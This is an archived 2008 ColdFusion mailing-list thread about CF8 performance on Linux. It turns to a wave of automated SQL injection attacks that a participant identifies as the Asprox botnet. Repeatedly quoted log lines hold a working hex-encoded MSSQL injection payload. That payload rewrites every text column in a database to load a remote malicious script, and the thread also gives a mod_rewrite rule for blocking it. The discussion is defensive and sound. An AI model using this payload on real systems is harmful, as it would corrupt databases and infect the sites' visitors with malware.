Re: CF8 on linux -- who's running it on large sites?

> Hey folks,
>
> Looks like this list is pretty quiet nowadays.
>
> We're about ready to upgrade to CF8 from CF6.1, mainly for the
> performance improvements.  
>
> We never upgraded from CF6.1 to 7 because 6.1 frankly runs just great
> and we use a pretty small and optimized set of features, but the juicy
> performance metrics of 8 look to be well worth it.
>
> I'm just curious as to how many of you larger linux implementations
> are running CFMX 8 right now, and what your experience has been
> stability-wise, and whether you ran into any compatibility or
> connector issues.  
>
> Regards
> Terry

> From: Wil Genovese <juggler@...>
> Subject: Re: CF8 on linux -- who's running it on large sites?
> To: "CF-Linux" <cf-linux@...>
> Date: Friday, August 1, 2008, 6:14 PM
> > Hey folks,
> >
> > Looks like this list is pretty quiet nowadays.
> >
> > We're about ready to upgrade to CF8 from CF6.1,
> mainly for the
> > performance improvements.  
> >
> > We never upgraded from CF6.1 to 7 because 6.1 frankly
> runs just great
> > and we use a pretty small and optimized set of
> features, but the juicy
> > performance metrics of 8 look to be well worth it.
> >
> > I'm just curious as to how many of you larger
> linux implementations
> > are running CFMX 8 right now, and what your experience
> has been
> > stability-wise, and whether you ran into any
> compatibility or
> > connector issues.  
> >
> > Regards
> > Terry
>
> I just thought I would post an update on this since peoples
> are wondering about high traffic sites.  We just launched
> the first of five CF 8.0.1 64bit servers on Linux RH 5.xx.
>
> So far the installs we've done (in house and
> production) have not had any major issues.  We've only
> needed to install our custom cfx or jar's and tune the
> JVM's.
>
> This week we launched a production server and with a few
> minor JVM tuning tweaks we've got it running pretty
> good.  This weekend and Monday will tell us more.  So far
> it's handling about a third of our total website service
> traffic. We run three CF servers behind a load balancer to
> handle all the http://www.mlsfinder.com traffic.  These
> three servers see about 2.3 million CF Page views per day
> (as of July 1st, 2008) and the load is spread at 33% each.
>
> If this weekend and Monday (our servers busiest day)
> turnout well we'll be upgrading the remaining servers
> next week.
>
> So far our cf7 code (which is really cf4 and cf5 code that
> was tweaked enough to run on CF7) runs just fine and even
> faster than on cf7. Turds really can fly with CF8.  :-O
> (yeah the code base is old and we are starting a new code
> base which is CFMX OOMVC, but it all takes time and money.)
>
> Since we're upgrading from CF7.01 ENT 32bit to CF8.0.1
> 64Bit our upgrade process is as follows, make a disk image
> (in case all goes bad) wipe the server clean and install RH
> 5 64bit then install CF8.0.1 645 bit.  Then apply all the
> config settings.
>
>
> Wil Genovese
> Wolfnet Technologies, LLC
>
>

> Thanks for the update.  We've been running CF8 for a few months now  
> with no problems.   Approximately 1.5M CF pages a day on a single  
> server.  The server is barely breaking a sweat too... I suspect we  
> could probably do 50% more traffic on this machine without major  
> performance issues.   We use lots of caching.
>
> 178 days now without a reboot.  Haven't had a single crash since we  
> switched to CF8. Needless to say, very impressed!
>
> Totally unrelated:   has anyone seen massive SQL injection attacks  
> over the last few days / weeks?   We're getting tens of thousands of  
> injection attacks from hundreds of different IPs each day.  It  
> started off slow, but now they're coming in like mad.   It has  
> almost become a DOS attack now over the past 24 hrs.
>
> The injection attacks don't worry me -- we're well coded against  
> them (and these seem to be MSSQL attacks).   But the sheer volume of  
> traffic being generated is starting to get a little worrisome.    
> Does anyone know more about where this attack is coming from?   Is  
> it a centrally controlled attack, a worm, ...?
>
>
> Here is a typical attack:
>
> 70.156.129.101 - - [07/Aug/2008:17:12:33 -0500] "GET /path/
> template.cfm?gid=1074';DECLARE%20@S%20CHAR(4000);SET
> %20
> @S
> =
> CAST
> (0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626
> C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E7874797
> 0653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C452
> 8404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F6
> 3737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F736372697
> 0743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72
> %20AS%20CHAR(4000));EXEC(@S); HTTP/
> 1.1" 200 36 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT  
> 5.1; .NET CLR 1.1.4322)"
>
>
> Regards
> Terry
>
>
> --- On Fri, 8/1/08, Wil Genovese <juggler@...> wrote:
>
>> From: Wil Genovese <juggler@...>
>> Subject: Re: CF8 on linux -- who's running it on large sites?
>> To: "CF-Linux" <cf-linux@...>
>> Date: Friday, August 1, 2008, 6:14 PM
>>> Hey folks,
>>>
>>> Looks like this list is pretty quiet nowadays.
>>>
>>> We're about ready to upgrade to CF8 from CF6.1,
>> mainly for the
>>> performance improvements.
>>>
>>> We never upgraded from CF6.1 to 7 because 6.1 frankly
>> runs just great
>>> and we use a pretty small and optimized set of
>> features, but the juicy
>>> performance metrics of 8 look to be well worth it.
>>>
>>> I'm just curious as to how many of you larger
>> linux implementations
>>> are running CFMX 8 right now, and what your experience
>> has been
>>> stability-wise, and whether you ran into any
>> compatibility or
>>> connector issues.
>>>
>>> Regards
>>> Terry
>>
>> I just thought I would post an update on this since peoples
>> are wondering about high traffic sites.  We just launched
>> the first of five CF 8.0.1 64bit servers on Linux RH 5.xx.
>>
>> So far the installs we've done (in house and
>> production) have not had any major issues.  We've only
>> needed to install our custom cfx or jar's and tune the
>> JVM's.
>>
>> This week we launched a production server and with a few
>> minor JVM tuning tweaks we've got it running pretty
>> good.  This weekend and Monday will tell us more.  So far
>> it's handling about a third of our total website service
>> traffic. We run three CF servers behind a load balancer to
>> handle all the http://www.mlsfinder.com traffic.  These
>> three servers see about 2.3 million CF Page views per day
>> (as of July 1st, 2008) and the load is spread at 33% each.
>>
>> If this weekend and Monday (our servers busiest day)
>> turnout well we'll be upgrading the remaining servers
>> next week.
>>
>> So far our cf7 code (which is really cf4 and cf5 code that
>> was tweaked enough to run on CF7) runs just fine and even
>> faster than on cf7. Turds really can fly with CF8.  :-O
>> (yeah the code base is old and we are starting a new code
>> base which is CFMX OOMVC, but it all takes time and money.)
>>
>> Since we're upgrading from CF7.01 ENT 32bit to CF8.0.1
>> 64Bit our upgrade process is as follows, make a disk image
>> (in case all goes bad) wipe the server clean and install RH
>> 5 64bit then install CF8.0.1 645 bit.  Then apply all the
>> config settings.
>>
>>
>> Wil Genovese
>> Wolfnet Technologies, LLC
>>
>>
>
>

> Thanks for the update.  We've been running CF8 for a few months now  
> with no problems.   Approximately 1.5M CF pages a day on a single  
> server.  The server is barely breaking a sweat too... I suspect we  
> could probably do 50% more traffic on this machine without major  
> performance issues.   We use lots of caching.
>
> 178 days now without a reboot.  Haven't had a single crash since we  
> switched to CF8. Needless to say, very impressed!
>
> Totally unrelated:   has anyone seen massive SQL injection attacks  
> over the last few days / weeks?   We're getting tens of thousands of  
> injection attacks from hundreds of different IPs each day.  It  
> started off slow, but now they're coming in like mad.   It has  
> almost become a DOS attack now over the past 24 hrs.
>
> The injection attacks don't worry me -- we're well coded against  
> them (and these seem to be MSSQL attacks).   But the sheer volume of  
> traffic being generated is starting to get a little worrisome.    
> Does anyone know more about where this attack is coming from?   Is  
> it a centrally controlled attack, a worm, ...?
>
>
> Here is a typical attack:
>
> 70.156.129.101 - - [07/Aug/2008:17:12:33 -0500] "GET /path/
> template.cfm?gid=1074';DECLARE%20@S%20CHAR(4000);SET
> %20
> @S
> =
> CAST
> (0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626
> C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E7874797
> 0653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C452
> 8404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F6
> 3737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F736372697
> 0743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72
> %20AS%20CHAR(4000));EXEC(@S); HTTP/
> 1.1" 200 36 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT  
> 5.1; .NET CLR 1.1.4322)"
>
>
> Regards
> Terry
>

> It is a centrally controlled attack running on zombie computers. I am
> pretty sure that this is related to the recent spate of hijacking and
> DNS issues. You are not the lone ranger.
>
> Cary Gordon
> The Cherry Hill Company
> http://chillco.com
>
>
> On Aug 7, 2008, at 3:23 PM, Terry Ford wrote:
>
>> Thanks for the update.  We've been running CF8 for a few months now
>> with no problems.   Approximately 1.5M CF pages a day on a single
>> server.  The server is barely breaking a sweat too... I suspect we
>> could probably do 50% more traffic on this machine without major
>> performance issues.   We use lots of caching.
>>
>> 178 days now without a reboot.  Haven't had a single crash since we
>> switched to CF8. Needless to say, very impressed!
>>
>> Totally unrelated:   has anyone seen massive SQL injection attacks
>> over the last few days / weeks?   We're getting tens of thousands of
>> injection attacks from hundreds of different IPs each day.  It
>> started off slow, but now they're coming in like mad.   It has
>> almost become a DOS attack now over the past 24 hrs.
>>
>> The injection attacks don't worry me -- we're well coded against
>> them (and these seem to be MSSQL attacks).   But the sheer volume of
>> traffic being generated is starting to get a little worrisome.
>> Does anyone know more about where this attack is coming from?   Is
>> it a centrally controlled attack, a worm, ...?
>>
>>
>> Here is a typical attack:
>>
>> 70.156.129.101 - - [07/Aug/2008:17:12:33 -0500] "GET /path/
>> template.cfm?gid=1074';DECLARE%20@S%20CHAR(4000);SET
>> %20
>> @S
>> =
>> CAST
>> (0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626
>> C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E7874797
>> 0653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C452
>> 8404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F6
>> 3737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F736372697
>> 0743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72
>> %20AS%20CHAR(4000));EXEC(@S); HTTP/
>> 1.1" 200 36 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT
>> 5.1; .NET CLR 1.1.4322)"
>>
>>
>> Regards
>> Terry
>>
>>
>> --- On Fri, 8/1/08, Wil Genovese <juggler@...> wrote:
>>
>>> From: Wil Genovese <juggler@...>
>>> Subject: Re: CF8 on linux -- who's running it on large sites?
>>> To: "CF-Linux" <cf-linux@...>
>>> Date: Friday, August 1, 2008, 6:14 PM
>>>> Hey folks,
>>>>
>>>> Looks like this list is pretty quiet nowadays.
>>>>
>>>> We're about ready to upgrade to CF8 from CF6.1,
>>> mainly for the
>>>> performance improvements.
>>>>
>>>> We never upgraded from CF6.1 to 7 because 6.1 frankly
>>> runs just great
>>>> and we use a pretty small and optimized set of
>>> features, but the juicy
>>>> performance metrics of 8 look to be well worth it.
>>>>
>>>> I'm just curious as to how many of you larger
>>> linux implementations
>>>> are running CFMX 8 right now, and what your experience
>>> has been
>>>> stability-wise, and whether you ran into any
>>> compatibility or
>>>> connector issues.
>>>>
>>>> Regards
>>>> Terry
>>>
>>> I just thought I would post an update on this since peoples
>>> are wondering about high traffic sites.  We just launched
>>> the first of five CF 8.0.1 64bit servers on Linux RH 5.xx.
>>>
>>> So far the installs we've done (in house and
>>> production) have not had any major issues.  We've only
>>> needed to install our custom cfx or jar's and tune the
>>> JVM's.
>>>
>>> This week we launched a production server and with a few
>>> minor JVM tuning tweaks we've got it running pretty
>>> good.  This weekend and Monday will tell us more.  So far
>>> it's handling about a third of our total website service
>>> traffic. We run three CF servers behind a load balancer to
>>> handle all the http://www.mlsfinder.com traffic.  These
>>> three servers see about 2.3 million CF Page views per day
>>> (as of July 1st, 2008) and the load is spread at 33% each.
>>>
>>> If this weekend and Monday (our servers busiest day)
>>> turnout well we'll be upgrading the remaining servers
>>> next week.
>>>
>>> So far our cf7 code (which is really cf4 and cf5 code that
>>> was tweaked enough to run on CF7) runs just fine and even
>>> faster than on cf7. Turds really can fly with CF8.  :-O
>>> (yeah the code base is old and we are starting a new code
>>> base which is CFMX OOMVC, but it all takes time and money.)
>>>
>>> Since we're upgrading from CF7.01 ENT 32bit to CF8.0.1
>>> 64Bit our upgrade process is as follows, make a disk image
>>> (in case all goes bad) wipe the server clean and install RH
>>> 5 64bit then install CF8.0.1 645 bit.  Then apply all the
>>> config settings.
>>>
>>>
>>> Wil Genovese
>>> Wolfnet Technologies, LLC
>>>
>>>
>>
>>
>
>

> Thanks for the update.  We've been running CF8 for a few months now  
> with no problems.   Approximately 1.5M CF pages a day on a single  
> server.  The server is barely breaking a sweat too... I suspect we
> could probably do 50% more traffic on this machine without major
> performance issues.   We use lots of caching.
>
> 178 days now without a reboot.  Haven't had a single crash since we
> switched to CF8. Needless to say, very impressed!
>
> Totally unrelated:   has anyone seen massive SQL injection attacks  
> over the last few days / weeks?   We're getting tens of thousands of  
> injection attacks from hundreds of different IPs each day.  It  
> started off slow, but now they're coming in like mad.   It has  
> almost become a DOS attack now over the past 24 hrs.
>
> The injection attacks don't worry me -- we're well coded against  
> them (and these seem to be MSSQL attacks).   But the sheer volume of  
> traffic being generated is starting to get a little worrisome.    
> Does anyone know more about where this attack is coming from?   Is  
> it a centrally controlled attack, a worm, ...?
>
>
> Here is a typical attack:
>
> 70.156.129.101 - - [07/Aug/2008:17:12:33 -0500] "GET /path/
> template.cfm?gid=1074';DECLARE%20@S%20CHAR(4000);SET
> %20
> @S
> =
> CAST
> (0x4445434C415245204054207661726368617228323535292C4043207661726368617
> 2283430303029204445434C415245205461626
> C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C6
> 22E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E732
> 06220776865726520612E69643D622E696420616E6420612E78747970653D277527206
> 16E642028622E7874797
> 0653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206
> F7220622E78747970653D31363729204F50454E205461626C655F437572736F7220464
> 5544348204E4558542046524F4D20205461626C655F437572736F7220494E544F20405
> 42C4043205748494C452
> 8404046455443485F5354415455533D302920424547494E20657865632827757064617
> 465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B272
> 7223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E3
> 13030306D672E636E2F6
> 3737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272
> B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C7363726970742
> 07372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6
> A73223E3C2F736372697
> 0743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437
> 572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43757
> 2736F72204445414C4C4F43415445205461626C655F437572736F72
> %20AS%20CHAR(4000));EXEC(@S); HTTP/
> 1.1" 200 36 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
> .NET CLR 1.1.4322)"
>
>
> Regards
> Terry
>

> On Thursday 07 Aug 2008, Cary Gordon wrote:
>> It is a centrally controlled attack running on zombie computers. I am
>> pretty sure that this is related to the recent spate of hijacking and
>> DNS issues.
>
> It's nothing to do with the most recent DNS protocol changes.
>
> --
> Tom Chiverton
>

> Our server has now logged 51,000 attack requests in the last 4 hours.
>
> 160,000 attacks in the past 24 hours.
>
> I suspect we are getting hit so hard because we have hundreds of  
> thousands of pages in Google.
>
> In short, these attacks are starting to grow very quickly in  
> intensity.
>
> We are redirecting them away from CF with mod_rewrite, so CURRENTLY  
> there is no major problem.
>
> My concern is what we are to do if these attacks keep growing at the  
> current rate, and we end up taking in MILLIONS of requests an hour a  
> day or two from now.   Does anyone know of any solution?
>
> Our ISP has a firewall product (Cisco ASA firewall), but it deals on  
> the packet level only.  It has no visibility into URLs, so we have  
> no way right now to filter traffic based on URL parameters.
>
> Any ideas on what we are to do should things continue to worsen?
> Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4427
> Subscription: http://www.houseoffusion.com/groups/CF-Linux/subscribe.cfm
> Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=305.286.14

> From: Wil Genovese <juggler@...>
> Subject: Re: SQL injection attacks getting out of control
> To: "CF-Linux" <cf-linux@...>
> Date: Friday, August 8, 2008, 12:11 PM
> what is your rewrite rule?   I'm ok with mod-rewite, but
> no expert  
> that's for sure.
>
>
> Wil Genovese
>
> One man with courage makes a majority.
> -Andrew Jackson
>
> A fine is a tax for doing wrong. A tax is a fine for doing
> well.
>
>
>

> -----Original Message-----
> From: Terry Ford [mailto:terryford76@...]
> Sent: Friday, August 08, 2008 1:21 PM
> To: CF-Linux
> Subject: Re: SQL injection attacks getting out of control
>
> Ok... here's what appears to be hitting us:
>
> http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
>
> I decoded the hex in the attack strings I'm seeing right now, and most of them are pointing to
> http://sdo.1000mg.cn/csrss/w.js.
>
> That is the Asprox botnet, which went through ASP sites a few months ago...  looks like they

> Looks like a good lesson against CF sloppiness.
>
>
> p.s. we're up to 62000 attack attempts now in 5 hours.   Still accelerating, but thankfully not
> exponential.
>
> Here's the rewrite I'm using.   Am no mod_rewrite expert, but it appears to be working:
>
> RewriteCond %{QUERY_STRING} .*DECLARE.*
> RewriteRule ^(.*)$  violation.htm [nc,L]
>
> Interesting philosophical thought:   I can't help but believe that the URL rewriting we do over

> it's a lot safer presenting your entire site as HTML to the outside world.
>
> Regards
> Terry
>
>
>
>
> --- On Fri, 8/8/08, Wil Genovese <juggler@...> wrote:
>
> > From: Wil Genovese <juggler@...>
> > Subject: Re: SQL injection attacks getting out of control
> > To: "CF-Linux" <cf-linux@...>
> > Date: Friday, August 8, 2008, 12:11 PM
> > what is your rewrite rule?   I'm ok with mod-rewite, but
> > no expert
> > that's for sure.
> >
> >
> > Wil Genovese
> >
> > One man with courage makes a majority.
> > -Andrew Jackson
> >
> > A fine is a tax for doing wrong. A tax is a fine for doing
> > well.
> >
> >
> >
>
>

>> RewriteCond %{QUERY_STRING} .*DECLARE.*
>> RewriteRule ^(.*)$  violation.htm [nc,L]
>>    
>
> Ok, that looks short and simple enough that maybe I can handle
> with 156 emails from the list.
>
> I have never used an mod_rewrites or whatever, so I guess I should
> put these on my VPS running MySQL and IIS6?
>
> If so, is there a simple explanation of how to do it?  Oh wait, this
> came from the cf-linux list.  The mod is a linux deal only, right?
>
> You guys have got me worried...
>
> Rick
>
>
>  
>> -----Original Message-----
>> From: Terry Ford [mailto:terryford76@...]
>> Sent: Friday, August 08, 2008 1:21 PM
>> To: CF-Linux
>> Subject: Re: SQL injection attacks getting out of control
>>
>> Ok... here's what appears to be hitting us:
>>
>> http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
>>
>> I decoded the hex in the attack strings I'm seeing right now, and most of them are pointing to
>> http://sdo.1000mg.cn/csrss/w.js.
>>
>> That is the Asprox botnet, which went through ASP sites a few months ago...  looks like they
>>    
> recruited a
>  
>> bunch of drones, and those drones have moved from ASP (verynx attacks) to attack CF.   Pretty
>>    
> ingenious
>  
>> really, infecting websites via injection attack in order to infect clients with browser
>>    
> vulnerabilities.
>  
>> The more CF sites that get infected, the more drones that are recruited, and the more persistent
>>    
> the
>  
>> attacks become.
>>
>> In theory this should taper off as the botnet moves on to their next target.  Looks like it's
>>    
> hitting
>  
>> sites such as houseandfusion and our site hardest, which each have zillions of pages indexed in
>>    
> Google
>  
>> (they botnet chooses target pages from Google searches).
>>
>> Whatever the case, from what I've seen on CF-talk it appears that these attacks infected a lot of
>>    
> CF
>  
>> servers, and as such we're likely going to be targeted hard in all manners of attacks in the
>>    
> future.
>  
>> Looks like a good lesson against CF sloppiness.
>>
>>
>> p.s. we're up to 62000 attack attempts now in 5 hours.   Still accelerating, but thankfully not
>> exponential.
>>
>> Here's the rewrite I'm using.   Am no mod_rewrite expert, but it appears to be working:
>>
>> RewriteCond %{QUERY_STRING} .*DECLARE.*
>> RewriteRule ^(.*)$  violation.htm [nc,L]
>>
>> Interesting philosophical thought:   I can't help but believe that the URL rewriting we do over
>>    
> much of
>  
>> our site (product.cfm?id=14  appearing as /product/14.html etc etc) has helped reduce the attacks
>> significantly.   It seems to me that such URL rewriting is actually a very important security
>>    
> tool, as
>  
>> we enter a period where botnets start targetting .cfm pages.    I plan on increasing our CFM
>>    
> obfuscation
>  
>> over the coming weeks to help hide CF from the search engines and automated attacks.   Seems to me
>>    
> that
>  
>> it's a lot safer presenting your entire site as HTML to the outside world.
>>
>> Regards
>> Terry
>>
>>
>>
>>
>> --- On Fri, 8/8/08, Wil Genovese <juggler@...> wrote:
>>
>>    
>>> From: Wil Genovese <juggler@...>
>>> Subject: Re: SQL injection attacks getting out of control
>>> To: "CF-Linux" <cf-linux@...>
>>> Date: Friday, August 8, 2008, 12:11 PM
>>> what is your rewrite rule?   I'm ok with mod-rewite, but
>>> no expert
>>> that's for sure.
>>>
>>>
>>> Wil Genovese
>>>
>>> One man with courage makes a majority.
>>> -Andrew Jackson
>>>
>>> A fine is a tax for doing wrong. A tax is a fine for doing
>>> well.
>>>
>>>
>>>
>>>      
>>    
>
>